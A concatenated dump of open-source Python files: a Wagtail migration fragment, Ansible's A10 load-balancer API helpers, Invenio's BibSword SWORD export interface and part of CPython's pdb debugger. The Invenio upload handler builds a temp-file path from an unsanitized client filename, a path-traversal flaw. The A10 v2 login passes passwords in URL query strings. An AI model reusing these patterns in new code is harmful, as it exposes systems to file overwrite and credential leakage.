# have been assigned such permissions and it's harmless to leave them.
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0001_initial'),
]
operations = [
migrations.RunPython(initial_data, remove_initial_data),
]
|
ujenmr/ansible
|
refs/heads/devel
|
lib/ansible/module_utils/network/a10/a10.py
|
52
|
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# Copyright (c), Michael DeHaan <michael.dehaan@gmail.com>, 2012-2013
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
from ansible.module_utils.urls import fetch_url
AXAPI_PORT_PROTOCOLS = {
'tcp': 2,
'udp': 3,
}
AXAPI_VPORT_PROTOCOLS = {
'tcp': 2,
'udp': 3,
'fast-http': 9,
'http': 11,
'https': 12,
}
def a10_argument_spec():
return dict(
host=dict(type='str', required=True),
username=dict(type='str', aliases=['user', 'admin'], required=True),
password=dict(type='str', aliases=['pass', 'pwd'], required=True, no_log=True),
write_config=dict(type='bool', default=False)
)
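# Usage sketch (editorial; the extra option is hypothetical): a consumer
# module would typically extend this spec with its own options before
# constructing the AnsibleModule:
#
#     from ansible.module_utils.basic import AnsibleModule
#
#     argument_spec = a10_argument_spec()
#     argument_spec.update(dict(server_name=dict(type='str', required=True)))
#     module = AnsibleModule(argument_spec=argument_spec)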
def axapi_failure(result):
if 'response' in result and result['response'].get('status') == 'fail':
return True
return False
def axapi_call(module, url, post=None):
'''
Returns a datastructure based on the result of the API call
'''
rsp, info = fetch_url(module, url, data=post)
if not rsp or info['status'] >= 400:
module.fail_json(msg="failed to connect (status code %s), error was %s" % (info['status'], info.get('msg', 'no error given')))
try:
raw_data = rsp.read()
data = json.loads(raw_data)
except ValueError:
# at least one API call (system.action.write_config) returns
# XML even when JSON is requested, so do some minimal handling
# here to prevent failing even when the call succeeded
if 'status="ok"' in raw_data.lower():
data = {"response": {"status": "OK"}}
else:
data = {"response": {"status": "fail", "err": {"msg": raw_data}}}
except Exception:
module.fail_json(msg="could not read the result from the host")
finally:
rsp.close()
return data
def axapi_authenticate(module, base_url, username, password):
url = '%s&method=authenticate&username=%s&password=%s' % (base_url, username, password)
result = axapi_call(module, url)
if axapi_failure(result):
return module.fail_json(msg=result['response']['err']['msg'])
sessid = result['session_id']
return base_url + '&session_id=' + sessid
def axapi_authenticate_v3(module, base_url, username, password):
url = base_url
auth_payload = {"credentials": {"username": username, "password": password}}
result = axapi_call_v3(module, url, method='POST', body=json.dumps(auth_payload))
if axapi_failure(result):
return module.fail_json(msg=result['response']['err']['msg'])
signature = result['authresponse']['signature']
return signature
def axapi_call_v3(module, url, method=None, body=None, signature=None):
'''
Returns a datastructure based on the result of the API call
'''
if signature:
headers = {'content-type': 'application/json', 'Authorization': 'A10 %s' % signature}
else:
headers = {'content-type': 'application/json'}
rsp, info = fetch_url(module, url, method=method, data=body, headers=headers)
if not rsp or info['status'] >= 400:
module.fail_json(msg="failed to connect (status code %s), error was %s" % (info['status'], info.get('msg', 'no error given')))
try:
raw_data = rsp.read()
data = json.loads(raw_data)
except ValueError:
# at least one API call (system.action.write_config) returns
# XML even when JSON is requested, so do some minimal handling
# here to prevent failing even when the call succeeded
if 'status="ok"' in raw_data.lower():
data = {"response": {"status": "OK"}}
else:
data = {"response": {"status": "fail", "err": {"msg": raw_data}}}
except Exception:
module.fail_json(msg="could not read the result from the host")
finally:
rsp.close()
return data
def axapi_enabled_disabled(flag):
'''
The axapi uses 0/1 integer values for flags, rather than strings
or booleans, so convert the given flag to a 0 or 1. For now, params
    are specified as strings only, so that's what we check.
'''
if flag == 'enabled':
return 1
else:
return 0
def axapi_get_port_protocol(protocol):
return AXAPI_PORT_PROTOCOLS.get(protocol.lower(), None)
def axapi_get_vport_protocol(protocol):
return AXAPI_VPORT_PROTOCOLS.get(protocol.lower(), None)
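# Usage sketch (editorial; the endpoint path is an assumption based on how
# the v2 a10 modules build their URLs): authenticate once, then reuse the
# session-scoped URL for subsequent calls:
#
#     base_url = 'https://%s/services/rest/V2.1/?format=json' % host
#     session_url = axapi_authenticate(module, base_url, username, password)
#     result = axapi_call(module, session_url + '&method=slb.server.getAll')
#     if axapi_failure(result):
#         module.fail_json(msg=result['response']['err']['msg'])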
|
robk5uj/invenio
|
refs/heads/bft2012-01-03
|
modules/bibsword/lib/bibsword_webinterface.py
|
31
|
'''
Forward to ArXiv.org source code
'''
## This file is part of Invenio.
## Copyright (C) 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
__revision__ = "$Id$"
__lastupdated__ = """$Date$"""
import os
from invenio.access_control_engine import acc_authorize_action
from invenio.config import CFG_SITE_URL, CFG_TMPDIR
from invenio.webuser import page_not_authorized, collect_user_info
from invenio.bibsword_client import perform_display_sub_status, \
perform_display_server_list, \
perform_display_collection_list, \
perform_display_category_list, \
perform_display_metadata, \
perform_submit_record, \
perform_display_server_infos, \
list_remote_servers
from invenio.webpage import page
from invenio.messages import gettext_set_language
from invenio.webinterface_handler import wash_urlargd, WebInterfaceDirectory
from invenio.websubmit_functions.Get_Recid import \
get_existing_records_for_reportnumber
from invenio.search_engine_utils import get_fieldvalues
from invenio.bibsword_config import CFG_MARC_REPORT_NUMBER, CFG_MARC_ADDITIONAL_REPORT_NUMBER
class WebInterfaceSword(WebInterfaceDirectory):
""" Handle /bibsword set of pages."""
_exports = ['', 'remoteserverinfos']
def __init__(self, reqid=None):
'''Initialize'''
self.reqid = reqid
def __call__(self, req, form):
errors = []
warnings = []
body = ''
error_messages = []
#***********************************************************************
# Get values from the form
#***********************************************************************
argd = wash_urlargd(form, {
'ln' : (str, ''),
# information of the state of the form submission
'status' : (str, ''),
'submit' : (str, ''),
'last_row' : (str, ''),
'first_row' : (str, ''),
'offset' : (int, ''),
'total_rows' : (str, ''),
            # mandatory information
'id_record' : (str, ''),
'recid' : (int, 0),
'id_remote_server' : (str, ''),
'id_collection' : (str, ''),
'id_primary' : (str, ''),
'id_categories' : (list, []),
'id' : (str, ''),
'title' : (str, ''),
'summary' : (str, ''),
'author_name' : (str, ''),
'author_email' : (str, ''),
'contributor_name' : (list, []),
'contributor_email' : (list, []),
'contributor_affiliation' : (list, []),
            # optional information
'comment' : (str, ''),
'doi' : (str, ''),
'type' : (str, ''),
'journal_refs' : (list, []),
'report_nos' : (list, []),
'media' : (list, []),
'new_media' : (str, ''),
'filename' : (str, '')
})
# set language for i18n text auto generation
_ = gettext_set_language(argd['ln'])
#authentication
(auth_code, auth_message) = self.check_credential(req)
if auth_code != 0:
return page_not_authorized(req=req, referer='/bibsword',
text=auth_message, navtrail='')
user_info = collect_user_info(req)
#Build contributor tuples {name, email and affiliation(s)}
contributors = []
contributor_id = 0
affiliation_id = 0
for name in argd['contributor_name']:
contributor = {}
contributor['name'] = name
contributor['email'] = argd['contributor_email'][contributor_id]
contributor['affiliation'] = []
is_last_affiliation = False
            while not is_last_affiliation and \
affiliation_id < len(argd['contributor_affiliation']):
if argd['contributor_affiliation'][affiliation_id] == 'next':
is_last_affiliation = True
elif argd['contributor_affiliation'][affiliation_id] != '':
contributor['affiliation'].append(\
argd['contributor_affiliation'][affiliation_id])
affiliation_id += 1
contributors.append(contributor)
contributor_id += 1
argd['contributors'] = contributors
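        # Shape sketch (editorial): argd['contributors'] is now a list of
        # dicts such as
        #     [{'name': 'A. Author', 'email': 'a.author@example.org',
        #       'affiliation': ['CERN']}, ...]
        # where the flat contributor_affiliation list has been split into
        # per-contributor groups on the 'next' sentinel value.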
# get the uploaded file(s) (if there is one)
for key, formfields in form.items():
if key == "new_media" and hasattr(formfields, "filename") and formfields.filename:
filename = formfields.filename
fp = open(os.path.join(CFG_TMPDIR, filename), "w")
fp.write(formfields.file.read())
fp.close()
argd['media'].append(os.path.join(CFG_TMPDIR, filename))
argd['filename'] = os.path.join(CFG_TMPDIR, filename)
# Prepare navtrail
navtrail = '''<a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/help/admin">Admin Area</a>''' \
% {'CFG_SITE_URL': CFG_SITE_URL}
title = _("BibSword Admin Interface")
#***********************************************************************
# Display admin main page
#***********************************************************************
if argd['status'] == '' and argd['recid'] != '' and argd['id_remote_server'] != '':
remote_servers = list_remote_servers(argd['id_remote_server'])
if len(remote_servers) == 0:
error_messages.append("No corresponding remote server could be found")
(body, errors, warnings) = perform_display_server_list(
error_messages,
argd['id_record'])
else:
title = _("Export with BibSword: Step 2/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
(body, errors, warnings) = perform_display_collection_list(
argd['id_remote_server'],
argd['id_record'],
argd['recid'],
error_messages)
elif argd['status'] == '' or argd['submit'] == "Cancel":
(body, errors, warnings) = perform_display_sub_status()
elif argd['status'] == 'display_submission':
if argd['submit'] == 'Refresh all':
(body, errors, warnings) = \
perform_display_sub_status(1, argd['offset'], "refresh_all")
elif argd['submit'] == 'Select':
first_row = 1
(body, errors, warnings) = \
perform_display_sub_status(first_row, argd['offset'])
elif argd['submit'] == 'Next':
first_row = int(argd['last_row']) + 1
(body, errors, warnings) = \
perform_display_sub_status(first_row, argd['offset'])
elif argd['submit'] == 'Prev':
first_row = int(argd['first_row']) - int(argd['offset'])
(body, errors, warnings) = \
perform_display_sub_status(first_row, argd['offset'])
elif argd['submit'] == 'First':
(body, errors, warnings) = \
perform_display_sub_status(1, argd['offset'])
elif argd['submit'] == 'Last':
first_row = int(argd['total_rows']) - int(argd['offset']) + 1
(body, errors, warnings) = \
perform_display_sub_status(first_row, argd['offset'])
#***********************************************************************
# Select remote server
#***********************************************************************
        # when the user starts a new submission, display the remote server list
elif argd['submit'] == 'New submission':
title = _("Export with BibSword: Step 1/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
(body, errors, warnings) = \
perform_display_server_list(error_messages)
# check if the user has selected a remote server
elif argd['status'] == 'select_server':
title = _("Export with BibSword: Step 1/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
            # check if the given id_record exists and convert it into a recid
if argd['recid'] != 0:
report_numbers = get_fieldvalues(argd['recid'], CFG_MARC_REPORT_NUMBER)
report_numbers.extend(get_fieldvalues(argd['recid'], CFG_MARC_ADDITIONAL_REPORT_NUMBER))
if report_numbers:
argd['id_record'] = report_numbers[0]
elif argd['id_record'] == '':
error_messages.append("You must specify a report number")
else:
recids = \
get_existing_records_for_reportnumber(argd['id_record'])
if len(recids) == 0:
error_messages.append(\
"No document found with the given report number")
elif len(recids) > 1:
error_messages.append(\
"Several documents have been found with given the report number")
else:
argd['recid'] = recids[0]
if argd['id_remote_server'] in ['0', '']:
error_messages.append("No remote server was selected")
if not argd['id_remote_server'] in ['0', '']:
# get the server's name and host
remote_servers = list_remote_servers(argd['id_remote_server'])
if len(remote_servers) == 0:
error_messages.append("No corresponding remote server could be found")
argd['id_remote_server'] = '0'
if argd['id_remote_server'] in ['0', ''] or argd['recid'] == 0:
(body, errors, warnings) = perform_display_server_list(
error_messages,
argd['id_record'])
else:
title = _("Export with BibSword: Step 2/4")
(body, errors, warnings) = perform_display_collection_list(
argd['id_remote_server'],
argd['id_record'],
argd['recid'],
error_messages)
#***********************************************************************
# Select collection
#***********************************************************************
# check if the user wants to change the remote server
elif argd['submit'] == 'Modify server':
title = _("Export with BibSword: Step 1/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
(body, errors, warnings) = \
perform_display_server_list(error_messages, argd['id_record'])
# check if the user has selected a collection
elif argd['status'] == 'select_collection':
title = _("Export with BibSword: Step 2/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL': CFG_SITE_URL}
if argd['id_collection'] == '0':
error_messages.append("No collection was selected")
(body, errors, warnings) = perform_display_collection_list(
argd['id_remote_server'],
argd['id_record'],
argd['recid'],
error_messages)
else:
title = _("Export with BibSword: Step 3/4")
(body, errors, warnings) = perform_display_category_list(
argd['id_remote_server'],
argd['id_collection'],
argd['id_record'],
argd['recid'],
error_messages)
#***********************************************************************
# Select primary
#***********************************************************************
# check if the user wants to change the collection
elif argd['submit'] == 'Modify collection':
title = _("Export with BibSword: Step 2/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL': CFG_SITE_URL}
(body, errors, warnings) = perform_display_collection_list(
argd['id_remote_server'],
argd['id_record'],
argd['recid'],
error_messages)
# check if the user has selected a primary category
elif argd['status'] == 'select_primary_category':
title = _("Export with BibSword: Step 3/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
if argd['id_primary'] == '0':
error_messages.append("No primary category selected")
(body, errors, warnings) = perform_display_category_list(
argd['id_remote_server'],
argd['id_collection'],
argd['id_record'],
argd['recid'],
error_messages)
else:
title = _("Export with BibSword: Step 4/4")
(body, errors, warnings) = perform_display_metadata(user_info,
str(argd['id_remote_server']),
str(argd['id_collection']),
str(argd['id_primary']),
argd['id_categories'],
argd['id_record'],
argd['recid'],
error_messages)
#***********************************************************************
# Check record media and metadata
#***********************************************************************
# check if the user wants to change the collection
elif argd['submit'] == 'Modify destination':
title = _("Export with BibSword: Step 3/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
(body, errors, warnings) = perform_display_category_list(
argd['id_remote_server'],
argd['id_collection'],
argd['id_record'],
argd['recid'],
error_messages)
        # check if the metadata are complete and well-formed
elif argd['status'] == 'check_submission':
title = _("Export with BibSword: Step 4/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
if argd['submit'] == "Upload":
error_messages.append("Media loaded")
if argd['id'] == '':
error_messages.append("Id is missing")
if argd['title'] == '':
error_messages.append("Title is missing")
if argd['summary'] == '':
error_messages.append("summary is missing")
elif len(argd['summary']) < 25:
error_messages.append("summary must have at least 25 character")
if argd['author_name'] == '':
error_messages.append("No submitter name specified")
if argd['author_email'] == '':
error_messages.append("No submitter email specified")
if len(argd['contributors']) == 0:
error_messages.append("No author specified")
if len(error_messages) > 0:
(body, errors, warnings) = perform_display_metadata(user_info,
str(argd['id_remote_server']),
str(argd['id_collection']),
str(argd['id_primary']),
argd['id_categories'],
argd['id_record'],
argd['recid'],
error_messages,
argd)
else:
title = _("Export with BibSword: Acknowledgement")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
(body, errors, warnings) = perform_submit_record(user_info,
str(argd['id_remote_server']),
str(argd['id_collection']),
str(argd['id_primary']),
argd['id_categories'],
argd['recid'],
argd)
        # return all the updated information to be displayed
return page(title = title,
body = body,
navtrail = navtrail,
#uid = uid,
lastupdated = __lastupdated__,
req = req,
language = argd['ln'],
#errors = errors,
warnings = warnings,
navmenuid = "yourmessages")
def remoteserverinfos(self, req, form):
'''
        This method handles the /bibsword/remoteserverinfos call
'''
argd = wash_urlargd(form, {
'ln' : (str, ''),
'id' : (str, '')
})
#authentication
(auth_code, auth_message) = self.check_credential(req)
if auth_code != 0:
return page_not_authorized(req=req, referer='/bibsword',
text=auth_message, navtrail='')
body = perform_display_server_infos(argd['id'])
navtrail = ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
        # return all the updated information to be displayed
return page(title = 'Remote server infos',
body = body,
navtrail = navtrail,
#uid = uid,
lastupdated = __lastupdated__,
req = req,
language = argd['ln'],
errors = '',
warnings = '',
navmenuid = "yourmessages")
def check_credential(self, req):
'''
        This method checks whether the user has the right to access this
        function
'''
auth_code, auth_message = acc_authorize_action(req, 'runbibswordclient')
return (auth_code, auth_message)
index = __call__
|
kemalakyol48/python-for-android
|
refs/heads/master
|
python3-alpha/python3-src/Lib/pdb.py
|
47
|
#! /usr/bin/env python3
"""
The Python Debugger Pdb
=======================
To use the debugger in its simplest form:
>>> import pdb
>>> pdb.run('<a statement>')
The debugger's prompt is '(Pdb) '. This will stop in the first
function call in <a statement>.
Alternatively, if a statement terminated with an unhandled exception,
you can use pdb's post-mortem facility to inspect the contents of the
traceback:
>>> <a statement>
<exception traceback>
>>> import pdb
>>> pdb.pm()
The commands recognized by the debugger are listed in the next
section. Most can be abbreviated as indicated; e.g., h(elp) means
that 'help' can be typed as 'h' or 'help' (but not as 'he' or 'hel',
nor as 'H' or 'Help' or 'HELP'). Optional arguments are enclosed in
square brackets. Alternatives in the command syntax are separated
by a vertical bar (|).
A blank line repeats the previous command literally, except for
'list', where it lists the next 11 lines.
Commands that the debugger doesn't recognize are assumed to be Python
statements and are executed in the context of the program being
debugged. Python statements can also be prefixed with an exclamation
point ('!'). This is a powerful way to inspect the program being
debugged; it is even possible to change variables or call functions.
When an exception occurs in such a statement, the exception name is
printed but the debugger's state is not changed.
The debugger supports aliases, which can save typing. And aliases can
have parameters (see the alias help entry) which allows one a certain
level of adaptability to the context under examination.
Multiple commands may be entered on a single line, separated by the
pair ';;'. No intelligence is applied to separating the commands; the
input is split at the first ';;', even if it is in the middle of a
quoted string.
If a file ".pdbrc" exists in your home directory or in the current
directory, it is read in and executed as if it had been typed at the
debugger prompt. This is particularly useful for aliases. If both
files exist, the one in the home directory is read first and aliases
defined there can be overridden by the local file.
Aside from aliases, the debugger is not directly programmable; but it
is implemented as a class from which you can derive your own debugger
class, which you can make as fancy as you like.
Debugger commands
=================
"""
# NOTE: the actual command documentation is collected from docstrings of the
# commands and is appended to __doc__ after the class has been defined.
import os
import re
import sys
import cmd
import bdb
import dis
import code
import pprint
import signal
import inspect
import traceback
import linecache
class Restart(Exception):
"""Causes a debugger to be restarted for the debugged python program."""
pass
__all__ = ["run", "pm", "Pdb", "runeval", "runctx", "runcall", "set_trace",
"post_mortem", "help"]
def find_function(funcname, filename):
cre = re.compile(r'def\s+%s\s*[(]' % re.escape(funcname))
try:
fp = open(filename)
except IOError:
return None
# consumer of this info expects the first line to be 1
lineno = 1
answer = None
while True:
line = fp.readline()
if line == '':
break
if cre.match(line):
answer = funcname, filename, lineno
break
lineno += 1
fp.close()
return answer
def getsourcelines(obj):
lines, lineno = inspect.findsource(obj)
if inspect.isframe(obj) and obj.f_globals is obj.f_locals:
# must be a module frame: do not try to cut a block out of it
return lines, 1
elif inspect.ismodule(obj):
return lines, 1
return inspect.getblock(lines[lineno:]), lineno+1
def lasti2lineno(code, lasti):
linestarts = list(dis.findlinestarts(code))
linestarts.reverse()
for i, lineno in linestarts:
if lasti >= i:
return lineno
return 0
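# Example (editorial): dis.findlinestarts() yields (offset, lineno) pairs in
# increasing offset order, so scanning them in reverse returns the last line
# that starts at or before `lasti`; e.g. with linestarts [(0, 1), (6, 2),
# (12, 3)] and lasti == 8, the result is line 2.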
class _rstr(str):
"""String that doesn't quote its repr."""
def __repr__(self):
return self
# Interaction prompt line will separate file and call info from code
# text using value of line_prefix string. A newline and arrow may
# be to your liking. You can set it once pdb is imported using the
# command "pdb.line_prefix = '\n% '".
# line_prefix = ': ' # Use this to get the old situation back
line_prefix = '\n-> ' # Probably a better default
class Pdb(bdb.Bdb, cmd.Cmd):
def __init__(self, completekey='tab', stdin=None, stdout=None, skip=None,
nosigint=False):
bdb.Bdb.__init__(self, skip=skip)
cmd.Cmd.__init__(self, completekey, stdin, stdout)
if stdout:
self.use_rawinput = 0
self.prompt = '(Pdb) '
self.aliases = {}
self.displaying = {}
self.mainpyfile = ''
self._wait_for_mainpyfile = False
self.tb_lineno = {}
# Try to load readline if it exists
try:
import readline
except ImportError:
pass
self.allow_kbdint = False
self.nosigint = nosigint
# Read $HOME/.pdbrc and ./.pdbrc
self.rcLines = []
if 'HOME' in os.environ:
envHome = os.environ['HOME']
try:
with open(os.path.join(envHome, ".pdbrc")) as rcFile:
self.rcLines.extend(rcFile)
except IOError:
pass
try:
with open(".pdbrc") as rcFile:
self.rcLines.extend(rcFile)
except IOError:
pass
self.commands = {} # associates a command list to breakpoint numbers
self.commands_doprompt = {} # for each bp num, tells if the prompt
# must be disp. after execing the cmd list
self.commands_silent = {} # for each bp num, tells if the stack trace
# must be disp. after execing the cmd list
self.commands_defining = False # True while in the process of defining
# a command list
self.commands_bnum = None # The breakpoint number for which we are
# defining a list
def sigint_handler(self, signum, frame):
if self.allow_kbdint:
raise KeyboardInterrupt
self.message("\nProgram interrupted. (Use 'cont' to resume).")
self.set_step()
self.set_trace(frame)
# restore previous signal handler
signal.signal(signal.SIGINT, self._previous_sigint_handler)
def reset(self):
bdb.Bdb.reset(self)
self.forget()
def forget(self):
self.lineno = None
self.stack = []
self.curindex = 0
self.curframe = None
self.tb_lineno.clear()
def setup(self, f, tb):
self.forget()
self.stack, self.curindex = self.get_stack(f, tb)
while tb:
# when setting up post-mortem debugging with a traceback, save all
# the original line numbers to be displayed along the current line
# numbers (which can be different, e.g. due to finally clauses)
lineno = lasti2lineno(tb.tb_frame.f_code, tb.tb_lasti)
self.tb_lineno[tb.tb_frame] = lineno
tb = tb.tb_next
self.curframe = self.stack[self.curindex][0]
# The f_locals dictionary is updated from the actual frame
# locals whenever the .f_locals accessor is called, so we
# cache it here to ensure that modifications are not overwritten.
self.curframe_locals = self.curframe.f_locals
return self.execRcLines()
# Can be executed earlier than 'setup' if desired
def execRcLines(self):
if not self.rcLines:
return
# local copy because of recursion
rcLines = self.rcLines
rcLines.reverse()
# execute every line only once
self.rcLines = []
while rcLines:
line = rcLines.pop().strip()
if line and line[0] != '#':
if self.onecmd(line):
# if onecmd returns True, the command wants to exit
# from the interaction, save leftover rc lines
# to execute before next interaction
self.rcLines += reversed(rcLines)
return True
# Override Bdb methods
def user_call(self, frame, argument_list):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self._wait_for_mainpyfile:
return
if self.stop_here(frame):
self.message('--Call--')
self.interaction(frame, None)
def user_line(self, frame):
"""This function is called when we stop or break at this line."""
if self._wait_for_mainpyfile:
if (self.mainpyfile != self.canonic(frame.f_code.co_filename)
or frame.f_lineno <= 0):
return
self._wait_for_mainpyfile = False
if self.bp_commands(frame):
self.interaction(frame, None)
def bp_commands(self, frame):
"""Call every command that was set for the current active breakpoint
(if there is one).
Returns True if the normal interaction function must be called,
False otherwise."""
# self.currentbp is set in bdb in Bdb.break_here if a breakpoint was hit
if getattr(self, "currentbp", False) and \
self.currentbp in self.commands:
currentbp = self.currentbp
self.currentbp = 0
lastcmd_back = self.lastcmd
self.setup(frame, None)
for line in self.commands[currentbp]:
self.onecmd(line)
self.lastcmd = lastcmd_back
if not self.commands_silent[currentbp]:
self.print_stack_entry(self.stack[self.curindex])
if self.commands_doprompt[currentbp]:
self._cmdloop()
self.forget()
return
return 1
def user_return(self, frame, return_value):
"""This function is called when a return trap is set here."""
if self._wait_for_mainpyfile:
return
frame.f_locals['__return__'] = return_value
self.message('--Return--')
self.interaction(frame, None)
def user_exception(self, frame, exc_info):
"""This function is called if an exception occurs,
but only if we are to stop at or just below this level."""
if self._wait_for_mainpyfile:
return
exc_type, exc_value, exc_traceback = exc_info
frame.f_locals['__exception__'] = exc_type, exc_value
self.message(traceback.format_exception_only(exc_type,
exc_value)[-1].strip())
self.interaction(frame, exc_traceback)
# General interaction function
def _cmdloop(self):
while True:
try:
# keyboard interrupts allow for an easy way to cancel
# the current command, so allow them during interactive input
self.allow_kbdint = True
self.cmdloop()
self.allow_kbdint = False
break
except KeyboardInterrupt:
self.message('--KeyboardInterrupt--')
# Called before loop, handles display expressions
def preloop(self):
displaying = self.displaying.get(self.curframe)
if displaying:
for expr, oldvalue in displaying.items():
newvalue = self._getval_except(expr)
# check for identity first; this prevents custom __eq__ to
# be called at every loop, and also prevents instances whose
# fields are changed to be displayed
if newvalue is not oldvalue and newvalue != oldvalue:
displaying[expr] = newvalue
self.message('display %s: %r [old: %r]' %
(expr, newvalue, oldvalue))
def interaction(self, frame, traceback):
if self.setup(frame, traceback):
# no interaction desired at this time (happens if .pdbrc contains
# a command like "continue")
self.forget()
return
self.print_stack_entry(self.stack[self.curindex])
self._cmdloop()
self.forget()
def displayhook(self, obj):
"""Custom displayhook for the exec in default(), which prevents
assignment of the _ variable in the builtins.
"""
# reproduce the behavior of the standard displayhook, not printing None
if obj is not None:
self.message(repr(obj))
def default(self, line):
if line[:1] == '!': line = line[1:]
locals = self.curframe_locals
globals = self.curframe.f_globals
try:
code = compile(line + '\n', '<stdin>', 'single')
save_stdout = sys.stdout
save_stdin = sys.stdin
save_displayhook = sys.displayhook
try:
sys.stdin = self.stdin
sys.stdout = self.stdout
sys.displayhook = self.displayhook
exec(code, globals, locals)
finally:
sys.stdout = save_stdout
sys.stdin = save_stdin
sys.displayhook = save_displayhook
except:
exc_info = sys.exc_info()[:2]
self.error(traceback.format_exception_only(*exc_info)[-1].strip())
def precmd(self, line):
"""Handle alias expansion and ';;' separator."""
if not line.strip():
return line
args = line.split()
while args[0] in self.aliases:
line = self.aliases[args[0]]
ii = 1
for tmpArg in args[1:]:
line = line.replace("%" + str(ii),
tmpArg)
ii += 1
line = line.replace("%*", ' '.join(args[1:]))
args = line.split()
# split into ';;' separated commands
# unless it's an alias command
if args[0] != 'alias':
marker = line.find(';;')
if marker >= 0:
# queue up everything after marker
next = line[marker+2:].lstrip()
self.cmdqueue.append(next)
line = line[:marker].rstrip()
return line
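    # Expansion sketch (editorial): given a previously defined alias such as
    #     alias pi p %1.__dict__
    # the input "pi obj" is rewritten above to "p obj.__dict__"; "%*" would
    # expand to all arguments joined by spaces.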
def onecmd(self, line):
"""Interpret the argument as though it had been typed in response
to the prompt.
Checks whether this line is typed at the normal prompt or in
a breakpoint command list definition.
"""
if not self.commands_defining:
return cmd.Cmd.onecmd(self, line)
else:
return self.handle_command_def(line)
def handle_command_def(self, line):
"""Handles one command line during command list definition."""
cmd, arg, line = self.parseline(line)
if not cmd:
return
if cmd == 'silent':
self.commands_silent[self.commands_bnum] = True
return # continue to handle other cmd def in the cmd list
elif cmd == 'end':
self.cmdqueue = []
return 1 # end of cmd list
cmdlist = self.commands[self.commands_bnum]
if arg:
cmdlist.append(cmd+' '+arg)
else:
cmdlist.append(cmd)
# Determine if we must stop
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
func = self.default
# one of the resuming commands
if func.__name__ in self.commands_resuming:
self.commands_doprompt[self.commands_bnum] = False
self.cmdqueue = []
return 1
return
# interface abstraction functions
def message(self, msg):
print(msg, file=self.stdout)
def error(self, msg):
print('***', msg, file=self.stdout)
# Command definitions, called by cmdloop()
# The argument is the remaining string on the command line
# Return true to exit from the command loop
def do_commands(self, arg):
"""commands [bpnumber]
(com) ...
(com) end
(Pdb)
Specify a list of commands for breakpoint number bpnumber.
The commands themselves are entered on the following lines.
Type a line containing just 'end' to terminate the commands.
The commands are executed when the breakpoint is hit.
To remove all commands from a breakpoint, type commands and
follow it immediately with end; that is, give no commands.
With no bpnumber argument, commands refers to the last
breakpoint set.
